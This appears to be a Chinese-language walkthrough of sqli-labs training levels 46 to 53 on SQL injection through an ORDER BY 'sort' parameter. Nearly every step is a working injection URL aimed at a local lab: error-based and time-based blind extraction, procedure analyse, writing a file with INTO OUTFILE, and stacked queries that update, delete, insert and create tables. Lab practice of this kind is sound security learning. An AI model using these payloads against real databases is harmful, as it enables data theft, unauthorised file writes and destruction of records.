LESS-46
1、order by的原理为排序,所以通过sort+asc或desc的输出是否相同便可知是否有使用到排序(ASC 代表结果会以由小往大的顺序列出,而 DESC 代表结果会以由大往小的顺序列出。如果两者皆没有被写出的话,那我们就会用 ASC。)
输入?Sort=1 desc
输入:?Sort=1 asc
两者不同说明这里使用了order by
1、报错注入
输入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),0x7e))–+
2、延时注入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+
(2)利用 procedure analyse 进行注入
procedure analyse 参数后注入,利用 procedure analyse 参数,我们可以执行报错注入。同时,在 procedure analyse 和 order by 之间可以存在 limit 参数,
输入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
(3)输出导入导出
:http://127.0.0.1/sqlilabs/Less-46/?sort=1 into outfile “c://phpStudy//PHPTutorial//www//sqlilabs//Less-46//bb.txt”%23
Less-47
与上一题不同的是sql语句中有单引号闭合。
(1)报错注入
输入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+(2)延时注入
输入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and if(ascii(substr(database(),1,1)) =115,0,sleep(5))–+
(3)procedure analyse输入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ %20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)–+
LESS-48
本关与LESS-46相似但是没有报错输出,故不能用报错注入,其他相同,不详写
(1)延时注入
http://127.0.0.1/sqlilabs/Less-48/?sort=1 and if(ascii(substr(database(),1,1))=115,0,sleep(5))–+
LESS-49
本题与47题相似但是没有报错注入,不详写LESS-50
执行 sql 语句我们这里使用的是 mysqli_multi_query()函数,而之前我们使用的是 mysqli _query(),区别在于 mysqli_multi_query()可以执行多个 sql 语句,而 mysqli_query()只能执行一个 sql 语句,那么我们此处就可以执行多个 sql 语句进行注入,也就是我们之前提到的 statcked injection。 (可参考38题解释)
(1)输入:http://127.0.0.1/sqlilabs/Less-50/?sort=1 ; update food set username=‘world’ where id=2 --+Less-51
与上一题的区别为这里为单引号闭合
输入:http://127.0.0.1/sqlilabs/Less-51/?sort=1’ ; delete from food where id=‘3’–+LESS-52
此处与less-50的区别为,这里没有报错输出
输入:http://127.0.0.1/sqlilabs/Less-52/?sort=1 ; insert into food(id,price,username) values (3,40,‘feel’)–+Less-53
这里和51题的区别为,虽都为单引号闭合但是此处没有报错输出;
Less-53
这里和51题的区别为,虽都为单引号闭合但是此处没有报错输出;
输入:http://127.0.0.1/sqlilabs/Less-53/?sort=1’ ; create table hello like users;